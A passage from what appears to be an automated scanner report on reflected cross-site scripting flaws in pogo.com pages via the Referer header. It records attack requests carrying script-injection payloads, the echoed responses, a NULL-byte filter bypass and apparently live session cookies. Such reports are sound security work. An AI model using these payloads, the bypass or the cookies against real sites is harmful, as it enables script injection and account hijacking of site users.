GET /news/us/netiquette/net-2009.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=83883</script>fce9da87ffa

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:59:01 GMT
Server: Apache-Coyote/1.1
Content-Length: 38538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Pogo: Communit
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=83883</script>fce9da87ffa";
s.eVar2="pogo";
s.pageName="Pogo News Ms. Netiquette Archive";
s.prop2="pogo";
s.channel="news";
s.prop7="POGO:news:messages::Pogo News Ms. Netiquette Archive:Non Authenticated";
s.prop8="Non Authen
...[SNIP]...

3.692. http://www.pogo.com/news/us/winnerscircle/winners-2010.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/news/us/winnerscircle/winners-2010.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89060</script><script>alert(1)</script>e8717c673a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /news/us/winnerscircle/winners-2010.jsp?pageSection=free_home_news#top HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=89060</script><script>alert(1)</script>e8717c673a3

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:58:35 GMT
Server: Apache-Coyote/1.1
Content-Length: 32773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Pogo: Communit
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=89060</script><script>alert(1)</script>e8717c673a3";
s.eVar2="pogo";
s.pageName="Pogo News Winners Circle";
s.prop2="pogo";
s.channel="news";
s.eVar18="un_free_home_news%23top";
s.prop7="POGO:news:messages::Pogo News Winners Circle:Non Authenticated";
...[SNIP]...

3.693. http://www.pogo.com/prize/prize.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/prize/prize.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 984d2</script>6545c68478a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /prize/prize.do HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: 984d2</script>6545c68478a

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:56:47 GMT
Server: Apache-Coyote/1.1
Content-Length: 25500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
tIdentifier;
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="984d2</script>6545c68478a";
s.eVar2="pogo";
s.pageName="Pogo Prize Page";
s.prop2="pogo";
s.channel="prizes";
s.prop7="POGO:prizes:Prizes::Pogo Prize Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_ja
...[SNIP]...

3.694. http://www.pogo.com/prize/prize.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/prize/prize.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93d27</script><script>alert(1)</script>4687fc424ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /prize/prize.do?pageSection=header_prizes HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=93d27</script><script>alert(1)</script>4687fc424ef
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

3.695. http://www.pogo.com/prize/rules.do [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/prize/rules.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf0b3</script><script>alert(1)</script>08734cd08f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /prize/rules.do HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: cf0b3</script><script>alert(1)</script>08734cd08f

Response

3.696. http://www.pogo.com/profiles/k7240 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/profiles/k7240

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %006a5b9</script><a>ed740adce0b was submitted in the Referer HTTP header. This input was echoed as 6a5b9</script><a>ed740adce0b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /profiles/k7240 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=%006a5b9</script><a>ed740adce0b

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:59:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 37970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=%006a5b9</script><a>ed740adce0b";
s.eVar2="pogo";
s.pageName="Free Pogo Full Profile";
s.prop2="pogo";
s.channel="friends";
s.prop7="POGO:friends:::Free Pogo Full Profile:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(o
...[SNIP]...

3.697. http://www.pogo.com/puzzle-games [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/puzzle-games

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38e38</script><script>alert(1)</script>9e879b8cc05 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /puzzle-games?pageSection=categorybar_puzzle HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: 38e38</script><script>alert(1)</script>9e879b8cc05

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:59:56 GMT
Server: Apache-Coyote/1.1
Content-Length: 106902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
tIdentifier;
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="38e38</script><script>alert(1)</script>9e879b8cc05";
s.eVar2="pogo";
s.pageName="Unauth Category Page filter - puzzle";
s.prop2="pogo";
s.channel="games";
s.eVar18="un_categorybar_puzzle";
s.prop7="POGO:games:playersOnline::Unauth Category Page filter
...[SNIP]...

3.698. http://www.pogo.com/puzzle-games [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/puzzle-games

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0087a19</script>8fdc2d67036 was submitted in the Referer HTTP header. This input was echoed as 87a19</script>8fdc2d67036 in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /puzzle-games HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=%0087a19</script>8fdc2d67036

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:59:45 GMT
Server: Apache-Coyote/1.1
Content-Length: 106836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=%0087a19</script>8fdc2d67036";
s.eVar2="pogo";
s.pageName="Unauth Category Page filter - puzzle";
s.prop2="pogo";
s.channel="games";
s.prop7="POGO:games:playersOnline::Unauth Category Page filter - puzzle:Non Authenticated";
s.pr
...[SNIP]...

3.699. http://www.pogo.com/sitemap [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/sitemap

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b03fe</script><script>alert(1)</script>e7e18f9aee9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /sitemap HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=b03fe</script><script>alert(1)</script>e7e18f9aee9

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:58:43 GMT
Server: Apache-Coyote/1.1
Content-Length: 56255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=b03fe</script><script>alert(1)</script>e7e18f9aee9";
s.pageName="Pogo Sitemap Page";
s.prop7="::::Pogo Sitemap Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
...[SNIP]...

3.700. http://www.pogo.com/word-games [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/word-games

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e93c</script>9a2837e5673 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /word-games?pageSection=footer_word HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
